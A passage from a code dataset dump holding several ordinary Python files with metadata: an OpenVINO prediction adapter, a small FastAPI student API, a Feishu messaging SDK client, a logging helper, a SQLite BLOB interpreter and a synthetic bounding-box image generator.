{"api_name": "smurf.db.models.Network.network_id", "line_number": 505, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network.query.filter", "line_number": 527, "usage_type": "call"}, {"api_name": "smurf.db.models.Network.query", "line_number": 527, "usage_type": "attribute"}, {"api_name": "smurf.db.models.Network", "line_number": 527, "usage_type": "name"}, {"api_name": "smurf.db.models.Network.network_id", "line_number": 527, "usage_type": "attribute"}, {"api_name": "smurf.api_requests.switch_config.SwitchConfig", "line_number": 540, "usage_type": "call"}, {"api_name": "smurf.api_requests.switch_config.SwitchConfig", "line_number": 545, "usage_type": "call"}, {"api_name": "smurf.api_requests.switch_config.SwitchConfig", "line_number": 550, "usage_type": "call"}]} +{"seq_id": "72429408442", "text": "from .adapter import Adapter, create_adapter\nfrom ..config import DictField\nfrom ..representation import ContainerPrediction\n\n\nclass MixedAdapter(Adapter):\n __provider__ = 'mixed'\n\n # this will be set after reading adapter configs\n prediction_types = ()\n\n @classmethod\n def parameters(cls):\n parameters = super().parameters()\n parameters.update({\n 'adapters': DictField(\n allow_empty=False,\n description='Dict where key is output name and value is adapter config map including'\n 'key \"output_blob\" to indicating output layer of model')\n })\n return parameters\n\n def __create_adapter(self, adapter_config, output_blob):\n adapter = create_adapter(adapter_config)\n adapter.launcher_config = self.launcher_config\n adapter.output_blob = output_blob\n return adapter\n\n def configure(self):\n adapters = self.get_value_from_config('adapters')\n self.adapters = {}\n for output_name, adapter_config in adapters.items():\n layer_name = adapter_config.pop('output_blob')\n self.adapters[layer_name] = (output_name, self.__create_adapter(adapter_config, layer_name))\n prediction_types = set()\n for _, adapter in self.adapters.values():\n prediction_types.update(adapter.prediction_types)\n self.prediction_types = tuple(prediction_types)\n\n @staticmethod\n def is_result_valid(result: dict):\n '''\n this method check whether values of result dict have the same length\n '''\n list_len = -1\n for val in result.values():\n if list_len < 0:\n list_len = len(val)\n else:\n if list_len != len(val):\n return False\n return True\n\n def process(self, raw, identifiers, frame_meta):\n result = {}\n\n for layer, (_, adapter) in self.adapters.items():\n result[layer] = adapter.process(raw, identifiers, frame_meta)\n\n if not self.is_result_valid(result):\n raise RuntimeError(\"length of predictions from each adapter should be same\")\n\n output = []\n\n for i, _ in enumerate(identifiers):\n container_args = {}\n for layer, (name, _) in self.adapters.items():\n if isinstance(result[layer][i], ContainerPrediction):\n container_args.update(result[layer][i].representations)\n else:\n container_args[name] = result[layer][i]\n output.append(ContainerPrediction(container_args))\n\n return output\n", "repo_name": "openvinotoolkit/open_model_zoo", "sub_path": "tools/accuracy_checker/openvino/tools/accuracy_checker/adapters/mixed_adapter.py", "file_name": "mixed_adapter.py", "file_ext": "py", "file_size_in_byte": 2645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3804, "dataset": "github-code", "pt": "41", "api": [{"api_name": "adapter.Adapter", "line_number": 6, "usage_type": "name"}, {"api_name": "config.DictField", "line_number": 16, "usage_type": "call"}, {"api_name": "adapter.create_adapter", "line_number": 24, "usage_type": "call"}, {"api_name": "adapter.launcher_config", "line_number": 25, "usage_type": "attribute"}, {"api_name": "adapter.output_blob", "line_number": 26, "usage_type": "attribute"}, {"api_name": "adapter.prediction_types", "line_number": 37, "usage_type": "attribute"}, {"api_name": "adapter.process", "line_number": 58, "usage_type": "call"}, {"api_name": "representation.ContainerPrediction", "line_number": 68, "usage_type": "argument"}, {"api_name": "representation.ContainerPrediction", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "33948737077", "text": "import imp\nfrom shutil import move\nfrom fastapi import FastAPI\n\napp = FastAPI()\n\nstudents = [\n{\n\"name\": \"\",\n\"class\": \"\",\n\"year\": 0\n},\n{\n\"name\": \"Ramu\",\n\"class\": \"9th\",\n\"year\": 1964\n},\n{\n\"name\": \"Maru\",\n\"class\": \"11th\",\n\"year\": 200\n},\n{\n\"name\": \"Jani\",\n\"class\": \"12th\",\n\"year\": 2005\n},\n{\n\"name\": \"Viju\",\n\"class\": \"10th\",\n\"year\": 2013\n}\n\n]\n\n# Home Page Message\n@app.get(\"/\")\nasync def root():\n return {'message':'welcome to API '}\n\n# All Students\n@app.get(\"/students\")\ndef get_students():\n return students\n\n# Single Student\n@app.get(\"/student/{student_id}\")\ndef get_Student(student_id:int):\n return students[student_id-1]\n\n# Delete\n@app.delete(\"/student/{student_id}\")\ndef delete_Student(student_id:int):\n students.pop(student_id)\n return {\"message\":\"Movie has been deleted successfully\"}\n\n# Adding - POST\n@app.post(\"/create_Student\")\ndef create_Student(student:dict):\n students.append(student)\n return students[-1]\n\n# Update Student\n@app.post(\"/update_Student\")\ndef update_Student(student_id:int, student:dict):\n student_updated = students[student_id]\n student_updated['name'] = student['name'] \n student_updated['class'] = student['class'] \n student_updated['year'] = student['year']\n students[student_id] = student_updated\n return student_updated\n\n# web: gunicorn main:app -k whispering-anchorage-28200.herokuapp.com/\n\n# pip install fastapi\n# pip install \"uvicorn[standard]\"\n# uvicorn main:app --reload", "repo_name": "akashbadole/api-fastapi", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.FastAPI", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "2661231494", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\n\nfrom typing import List\n\nfrom feishu_sdk.base_client import BaseClient\nfrom feishu_sdk.card.card import CardMessage\nfrom feishu_sdk.card.modules import DivModule\nfrom feishu_sdk.card.objects import LarkMdObj\nfrom feishu_sdk.feishu_response import FeishuResponse\n\n\nclass FeishuClient(BaseClient):\n \"\"\"\n TODO: 参数校验\n \"\"\"\n async def user_batch_get(self, open_ids: List = None, employ_ids: List = None) -> FeishuResponse:\n params = {\"open_ids\": open_ids} if open_ids else {'employ_ids': employ_ids}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/contact/v1/user/batch_get\", params=params, headers=auth_headers)\n\n async def user_batch_get_id(self, emails: List = [], mobiles: List = []) -> FeishuResponse:\n params = {'emails': emails, \"mobiles\": mobiles}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/user/v1/batch_get_id\", params=params, headers=auth_headers)\n\n async def user_search(self, query: str, page_size: int = 20, page_token: str = None) -> FeishuResponse:\n params = {\"query\": query, \"page_size\": page_size}\n if page_token:\n params['page_token'] = page_token\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/search/v1/user\", params=params, headers=auth_headers)\n\n async def chat_create(self,\n name: str,\n description: str = None,\n owner_open_id: str = None,\n owner_user_id: str = None,\n open_ids: List = None,\n user_ids: List = None,\n i18n_names: dict = None,\n only_owner_add: bool = False,\n share_allowed: bool = True,\n add_member_verify: bool = False,\n only_owner_at_all: bool = False,\n only_owner_edit: bool = False,\n send_message_permission: str = \"all\",\n join_message_visibility: str = \"all\",\n leave_message_visibility: str = \"owner\",\n group_email_enabled: bool = False,\n send_group_email_permission: str = \"tenant_member\") -> FeishuResponse:\n json = {\"name\": name}\n if owner_open_id:\n json[\"owner_open_id\"] = owner_open_id\n if owner_user_id:\n json[\"owner_user_id\"] = owner_user_id\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/create/\", json=json, headers=auth_headers)\n\n async def chat_info(self, chat_id: str) -> FeishuResponse:\n params = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/info\", params=params, headers=auth_headers)\n\n async def chat_update(self,\n chat_id: str,\n name: str = None,\n description: str = None,\n owner_open_id: str = None,\n owner_user_id: str = None,\n i18n_names: dict = None,\n only_owner_add: bool = False,\n share_allowed: bool = True,\n add_member_verify: bool = False,\n only_owner_at_all: bool = False,\n only_owner_edit: bool = False,\n send_message_permission: str = \"all\",\n join_message_visibility: str = \"all\",\n leave_message_visibility: str = \"owner\",\n group_email_enabled: bool = False,\n send_group_email_permission: str = \"tenant_member\"):\n json = {\"chat_id\": chat_id}\n if name:\n json[\"name\"] = name\n if description:\n json[\"description\"] = description\n if owner_open_id:\n json[\"owner_open_id\"] = owner_open_id\n if owner_user_id:\n json[\"owner_user_id\"] = owner_user_id\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/update/\", json=json, headers=auth_headers)\n\n async def chat_chatter_add(self, chat_id: str, open_ids: List = None, user_ids: List = None):\n json = {\"chat_id\": chat_id}\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/chatter/add/\", json=json, headers=auth_headers)\n\n async def chat_chatter_delete(self, chat_id: str, open_ids: List = None, user_ids: List = None):\n json = {\"chat_id\": chat_id}\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/chatter/delete/\", json=json, headers=auth_headers)\n\n async def chat_disband(self, chat_id: str):\n json = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/disband\", json=json, headers=auth_headers)\n\n async def chat_list(self, page_size: int = 100, page_token: str = None):\n params = {\"page_size\": page_size}\n if page_token:\n params[\"page_token\"] = page_token\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/chat/v4/list\", params=params, headers=auth_headers)\n\n async def bot_info(self):\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/bot/v3/info/\", params={}, headers=auth_headers)\n\n async def bot_add(self, chat_id: str):\n json = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/bot/v3/add/\", json=json, headers=auth_headers)\n\n async def bot_remove(self, chat_id: str):\n json = {\"chat_id\": chat_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/bot/v3/remove/\", json=json, headers=auth_headers)\n\n async def message_batch_send(self,\n msg_type: str,\n content: object,\n department_ids: List = None,\n open_ids: List = None,\n user_ids: List = None):\n json = {\"msg_type\": msg_type, \"content\": content}\n if department_ids:\n json[\"department_ids\"] = department_ids\n if open_ids:\n json[\"open_ids\"] = open_ids\n if user_ids:\n json[\"user_ids\"] = user_ids\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/batch_send/\", json=json, headers=auth_headers)\n\n async def message_text_send(self,\n text: str,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n return await self.__message_send(\"text\", {\"text\": text}, open_id, user_id, email, chat_id, root_id)\n\n async def message_image_send(self,\n image_key: str,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n return await self.__message_send(\"image\", {\"image_key\": image_key}, open_id, user_id, email, chat_id, root_id)\n\n async def message_post_send(self,\n content: List,\n title: str = None,\n zh_cn: object = None,\n ja_jp: object = None,\n en_us: object = None,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n post = {\"content\": content}\n if title:\n post[\"title\"] = title\n if zh_cn:\n post[\"zh_cn\"] = zh_cn\n if ja_jp:\n post[\"ja_jp\"] = ja_jp\n if en_us:\n post[\"en_us\"] = en_us\n return await self.__message_send(\"post\", post, open_id, user_id, email, chat_id, root_id)\n\n async def message_share_chat_send(self,\n share_open_chat_id: str,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n return await self.__message_send(\"share_chat\", {\"share_open_chat_id\": share_open_chat_id}, open_id, user_id, email,\n chat_id, root_id)\n\n async def message_md_send(self, md: str, open_id: str = None, chat_id: str = None, root_id: str = None):\n div_module = DivModule(text=LarkMdObj(content=md))\n card = CardMessage(elements=[div_module])\n return await self.message_interactive_send(card=card, open_id=open_id, chat_id=chat_id, root_id=root_id)\n\n async def message_interactive_send(self,\n card: CardMessage,\n update_multi: bool = False,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None):\n card_json = json.dumps(card, default=lambda o: o.__dict__)\n card_dict = json.loads(card_json)\n kwards = {\"card\": card_dict, \"update_multi\": update_multi}\n return await self.__message_send(\"interactive\",\n open_id=open_id,\n user_id=user_id,\n email=email,\n chat_id=chat_id,\n root_id=root_id,\n kwards=kwards)\n\n async def __message_send(self,\n msg_type: str,\n content: object = None,\n open_id: str = None,\n user_id: str = None,\n email: str = None,\n chat_id: str = None,\n root_id: str = None,\n kwards: dict = {}):\n json = {\"msg_type\": msg_type}\n if content:\n json[\"content\"] = content\n if open_id:\n json[\"open_id\"] = open_id\n if user_id:\n json[\"user_id\"] = user_id\n if email:\n json[\"email\"] = email\n if chat_id:\n json[\"chat_id\"] = chat_id\n if root_id:\n json[\"root_id\"] = root_id\n if kwards:\n json.update(kwards)\n\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/send/\", json=json, headers=auth_headers)\n\n async def message_recall(self, message_id: str):\n json = {\"message_id\": message_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/recall/\", json=json, headers=auth_headers)\n\n async def message_read_info(self, message_id: str):\n json = {\"message_id\": message_id}\n auth_headers = await self.auth_headers()\n return await self.api_call(\"/message/v4/read_info/\", json=json, headers=auth_headers)\n", "repo_name": "ilpan/feishu-sdk", "sub_path": "feishu_sdk/feishu_client.py", "file_name": "feishu_client.py", "file_ext": "py", "file_size_in_byte": 12432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "feishu_sdk.base_client.BaseClient", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 24, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 42, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 53, "usage_type": "name"}, {"api_name": "feishu_sdk.feishu_response.FeishuResponse", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 179, "usage_type": "name"}, {"api_name": "feishu_sdk.card.modules.DivModule", "line_number": 211, "usage_type": "call"}, {"api_name": "feishu_sdk.card.objects.LarkMdObj", "line_number": 211, "usage_type": "call"}, {"api_name": "feishu_sdk.card.card.CardMessage", "line_number": 212, "usage_type": "call"}, {"api_name": "feishu_sdk.card.card.CardMessage", "line_number": 216, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 223, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 224, "usage_type": "call"}, {"api_name": "json.update", "line_number": 257, "usage_type": "call"}]} +{"seq_id": "29098895633", "text": "__all__ = ['log_info', 'log_datasets']\n\nimport logging\nimport os\nfrom typing import Optional, Collection\n\nimport torch\nfrom flexlearn.context import Context\nfrom flexlearn.distributed import ProcessGroup\nfrom flexutils.io.file_system import simplify_path\nfrom flexutils.misc.string import format_table\n\n\ndef log_info(args,\n session_path,\n gpus: Collection[torch.device],\n process_group: Optional[ProcessGroup] = None,\n logger: Optional[logging.Logger] = None,\n task: str = \"training\"):\n logger = logger or Context.get_default_argument(\"logger\", required=True)\n process_group = process_group or Context.get_default_argument(\"process_group\")\n gpus = list(gpus)\n\n if process_group is None:\n if gpus:\n device_mapping = os.environ.get(\"CUDA_VISIBLE_DEVICES\")\n if device_mapping is not None:\n device_mapping = list(map(int, device_mapping.split(\",\")))\n else:\n device_mapping = list(range(torch.cuda.device_count()))\n if len(gpus) == 1:\n message = f\"The standalone {task} will be executed on gpu \" \\\n f\"{device_mapping[gpus[0].index]}\"\n else:\n message = f\"The standalone {task} will be executed on gpus \" \\\n f\"{[device_mapping[gpu.index] for gpu in gpus]}\"\n else:\n message = f\"The standalone {task} will executed on cpu\"\n logger.info(message)\n else:\n row_rank = [\n \"Rank\",\n str(process_group.global_rank()),\n str(process_group.local_rank()),\n str(process_group.node_rank())\n ]\n row_size = [\n \"Size\",\n str(process_group.global_size()),\n str(process_group.local_size()),\n str(process_group.node_size())\n ]\n table = format_table(headers=[\"\", \"Global\", \"Local\", \"Node\"],\n rows=[row_rank, row_size])\n logger.info(\n f\"The training will be conducted in distributed mode:\\n{table}\\n\")\n\n message = \"The paths for current training script:\\n\"\n if args.resume_path:\n message += f\"Resume path: {simplify_path(args.resume_path)}\\n\"\n else:\n message += f\"Config path: {simplify_path(args.config_path)}\\n\"\n message += f\"Dataset path: {simplify_path(args.dataset_path)}\\n\"\n message += f\"Session path: {simplify_path(session_path)}\\n\"\n logger.info(message)\n\n\ndef log_datasets(config: dict, logger: Optional[logging.Logger] = None):\n logger = logger or Context.get_default_argument(\"logger\", required=True)\n headers = [\"\", \"# Items\", \"# Batches\", \"Batch Size\"]\n rows = []\n for key, config in config.items():\n rows.append([\n key,\n str(len(config.dataset)),\n str(len(config.data_loader)),\n str(config.data_loader.batch_size)\n ])\n logger.info(\"Datasets:\\n\" + format_table(headers, rows) + \"\\n\")\n", "repo_name": "Kipsora/CSC2541", "sub_path": "utils/logging.py", "file_name": "logging.py", "file_ext": "py", "file_size_in_byte": 2787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Collection", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}, {"api_name": "flexlearn.distributed.ProcessGroup", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flexlearn.context.Context.get_default_argument", "line_number": 20, "usage_type": "call"}, {"api_name": "flexlearn.context.Context", "line_number": 20, "usage_type": "name"}, {"api_name": "flexlearn.context.Context.get_default_argument", "line_number": 21, "usage_type": "call"}, {"api_name": "flexlearn.context.Context", "line_number": 21, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 26, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.cuda.device_count", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flexutils.misc.string.format_table", "line_number": 53, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 60, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 62, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 63, "usage_type": "call"}, {"api_name": "flexutils.io.file_system.simplify_path", "line_number": 64, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 68, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flexlearn.context.Context.get_default_argument", "line_number": 69, "usage_type": "call"}, {"api_name": "flexlearn.context.Context", "line_number": 69, "usage_type": "name"}, {"api_name": "flexutils.misc.string.format_table", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "39312750320", "text": "import numpy as np\nimport sys\nimport configparser\n\n\n#%%\nclass BlobInterpreter:\n \"\"\"\n Class to interpret a blob.\n\n Interpreting a blob involves a known structure, which specifies\n 1) Descriptor (short string describing this field)\n 2) Type (word length i.e number of bits, and the type to cast to)\n\n Internally, this is kept as a list of tuples.\n\n This can be used to automatically generate multiple columns when selecting from a blob.\n\n Dynamically sized sections are also supported.\n To specify a dynamically sized section, suffix the descriptor with \"_dyn\".\n\n There are 3 scenarios of dynamically sized sections:\n ------------------------------------------------------\n 1) \"Flex\" arrays: only 1 of these are allowed per structure.\n These will attempt to occupy as much of the blob as possible.\n For example, a structure with\n a: u8\n b_dyn: u8\n c: u16\n\n will interpret a 10-byte blob as having a 7-byte array assigned to \"b_dyn\".\n ------------------------------------------------------\n 2) \"Externally fixed length\" arrays: the length is specified in the descriptor as well,\n like \"_3_dyn\".\n\n For example, a structure with\n a: u8\n b_3_dyn: u8\n c: u16\n\n requires a 6-byte blob, where \"b_3_dyn\" is a 3-byte array\n from the 2nd byte to the 4th byte i.e. [1:4]\n ------------------------------------------------------\n 3) \"Internally fixed length\" arrays: the length is specified in another field.\n These are denoted with \"_?_dyn\", and the associated field must have the same name,\n but suffixed with \"_len\".\n\n For example, a structure with\n a_len: u8\n a_?_dyn: u8\n\n will read \"a_len\" for the number of elements, then use that as the size of\n \"a_?_dyn\". This is commonly found in headers of packets.\n \"\"\"\n\n # Define type dictionary\n STR_TO_TYPE = {\n 'u8': np.uint8,\n 'u16': np.uint16,\n 'u32': np.uint32,\n 'u64': np.uint64,\n 'i8': np.int8,\n 'i16': np.int16,\n 'i32': np.int32,\n 'i64': np.int64,\n 'f32': np.float32,\n 'f64': np.float64,\n 'fc32': np.complex64,\n 'fc64': np.complex128\n }\n\n STR_TO_SIZE = {\n 'u8': 1,\n 'u16': 2,\n 'u32': 4,\n 'u64': 8,\n 'i8': 1,\n 'i16': 2,\n 'i32': 4,\n 'i64': 8,\n 'f32': 4,\n 'f64': 8,\n 'fc32': 8,\n 'fc64': 16\n }\n\n STR_TO_CSTR = {\n 'u8': '%hhu',\n 'u16': '%hu',\n 'u32': '%u',\n 'u64': '%lu',\n 'i8': '%hhd',\n 'i16': '%hd',\n 'i32': '%d',\n 'i64': '%ld',\n 'f32': '%f',\n 'f64': '%f',\n # 'fc32': '%f', # These are a little complicated, let's not handle them for now\n # 'fc64': '%f\n }\n\n def __init__(self, structure: list=[]):\n \"\"\"\n Creates a BlobInterpreter based on a specified structure.\n\n Parameters\n ----------\n structure : list\n Ordered list of tuples, where each tuple is of the form (descriptor, typestr).\n Type strings are specified in STR_TO_TYPE.\n Descriptors are fieldnames, usually used to identify the purpose of that section of data.\n \"\"\"\n if not isinstance(structure, list):\n raise TypeError('Structure must be a list of tuples')\n self._structure = structure\n\n @classmethod\n def fromDictionary(cls, structure: dict):\n \"\"\"\n Generates a BlobInterpreter from a dictionary.\n Dictionaries are expected to be ordered as of Python 3.7.\n \"\"\"\n version = sys.version_info\n if version.major < 3 or (version.major == 3 and version.minor < 7):\n raise TypeError(\"Dictionary interpretation requires Python 3.7 or higher\")\n return cls([(k, v) for k, v in structure.items()])\n \n @classmethod\n def fromConfig(cls, configfilepath: str, sectionname: str):\n \"\"\"\n Generates a BlobInterpreter from a configuration file.\n This is loaded with 'configparser'; see https://docs.python.org/3/library/configparser.html.\n Config files are expected to be ordered as of Python 3.7.\n \"\"\"\n version = sys.version_info\n if version.major < 3 or (version.major == 3 and version.minor < 7):\n raise TypeError(\"Configparser interpretation requires Python 3.7 or higher\")\n\n cfg = configparser.ConfigParser()\n cfg.read(configfilepath)\n section = cfg[sectionname]\n return cls([(k, v) for k, v in section.items()])\n\n def appendField(self, descriptor: str, type: str='u8'):\n \"\"\"\n Appends a field to the structure.\n\n Parameters\n ----------\n descriptor : str\n Description of the field.\n type : str\n String that specifies the type to cast to.\n Defaults to 'u8'.\n \"\"\"\n self._structure.append((descriptor, type))\n\n def interpret(self, blob: bytes) -> dict:\n \"\"\"\n Interprets a blob and returns a dict of arrays according to the structure.\n\n Parameters\n ----------\n blob : bytes\n Bytes object, usually obtained from a BLOB column select.\n\n Returns\n -------\n output : dict\n Dictionary of arrays, according to the internal structure.\n \"\"\"\n\n output = dict()\n ptr = 0\n for desc, typestr in self._structure:\n # Turn it into a numpy array\n interpreted = np.frombuffer(\n blob[ptr:ptr+self.STR_TO_SIZE[typestr]],\n dtype=self.STR_TO_TYPE[typestr]\n )\n\n ptr += self.STR_TO_SIZE[typestr]\n\n output[desc] = interpreted\n\n return output\n \n def generateSplitStatement(self, blobColumnName: str, hexOutput: bool=False):\n \"\"\"\n Generates SQL statement fragments that correspond to \n splitting a blob into multiple columns based on the structure.\n\n Parameters\n ----------\n blobColumnName : str\n The SQLite column name that contains the BLOB.\n hexOutput : bool\n Flag to determine whether to return as hex strings, useful for views.\n The default is False, which will return as raw BLOBs.\n \"\"\"\n output = []\n ptr = 1 # Sqlite substr starts from 1\n for desc, typestr in self._structure:\n size = self.STR_TO_SIZE[typestr]\n fragment = f'substr({blobColumnName},{ptr},{size})'\n if hexOutput:\n fragment = f'hex({fragment})'\n fragment = f'{fragment} AS {desc}'\n output.append(fragment)\n ptr += size\n\n return output\n \n def hexifyBlob(self, blob: bytes) -> str:\n \"\"\"\n Returns a hex string form of the blob, akin to what SQLite\n would produce with its hex() function.\n\n Parameters\n ----------\n blob : bytes\n Input bytes object. This may come from a slice of the\n SQLite BLOB column.\n\n Returns\n -------\n h : str\n Hex string formatted with %02X.\n \"\"\"\n h = \"\".join([\"%02X\" % i for i in blob])\n\n return h\n\n\n\n \n\n ", "repo_name": "icyveins7/sew", "sub_path": "sew/blobInterpreter.py", "file_name": "blobInterpreter.py", "file_ext": "py", "file_size_in_byte": 7259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.uint8", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.uint64", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.int8", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.int16", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.int64", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.complex64", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.complex128", "line_number": 69, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 123, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 135, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "24999472925", "text": "# 生成训练数据\nfrom PIL import Image\nimport numpy as np\nimport os\nimport pandas as pd\nnum_imgs = 100\n\nimg_size = 200\nmin_object_size = 1\nmax_object_size = 80\nnum_objects = 1\n\n# 设置相关矩阵存放数据\ndatas = np.zeros((num_imgs,img_size,img_size,4))\nfor i in range(num_imgs):\n datas[i,:,:,:] = 255\n# 存放box相关的数据\n# 存放 x y w h\nboxes = np.zeros((num_imgs,num_objects,4))\n\nfor i in range(num_imgs):\n for obj in range(num_objects):\n w,h = np.random.randint(min_object_size,max_object_size,size=2)\n x = np.random.randint(0,img_size-w)\n y = np.random.randint(0,img_size-h)\n # datas[i,x:x+w,y:y+h,:] = 0 \n datas[i,x:x+w,y:y+h,0] = np.random.randint(0,230) # 设置矩阵的颜色为1\n datas[i,x:x+w,y:y+h,1] = np.random.randint(0,230) # 设置矩阵的颜色为1\n datas[i,x:x+w,y:y+h,2] = np.random.randint(0,230) # 设置矩阵的颜色为1\n boxes[i,obj] = [y,x,w+x,h+y]\n# 138\n# 6\n# 155\n# 40\n\nnames_list = []\nnum_imgs_list = []\nx_list = []\ny_list = []\nx_max_list = []\ny_max_list = []\nfor i in range(num_imgs):\n for obj in range(num_objects):\n names_list.append(str(i)+'.png')\n num_imgs_list.append(img_size)\n x_list.append(int(boxes[i,obj,0]))\n y_list.append(int(boxes[i,obj,1]))\n x_max_list.append(int(boxes[i,obj,2]))\n y_max_list.append(int(boxes[i,obj,3]))\nclass_name = 'rect'\nd = {'filename':names_list,'width':num_imgs_list,'height':num_imgs_list,'class':class_name,'xmin':x_list,'ymin':y_list,'xmax':x_max_list,'ymax':y_max_list}\n# print(d)\nframe=pd.DataFrame(data=d)\nframe.head(5)\n# frame.to_csv('./train_labels.csv',index=None)\nframe.to_csv('./test_labels.csv',index=None)\n\nfor i in range(num_imgs):\n new_data = np.expand_dims(datas[i],2)\n Image.fromarray(np.uint8(datas[i])).save('/Users/hdy/Documents/upload/生成训练集/imgs/'+str(i)+'.png')\n\n# img = Image.open('/Users/hdy/Downloads/Unknown-7.png')\n# print(np.array(img))", "repo_name": "egdw/Recognize-Multiple-Shapes", "sub_path": "Google物体检测/训练集生成工具/生成训练集/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1958, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "attribute"}, 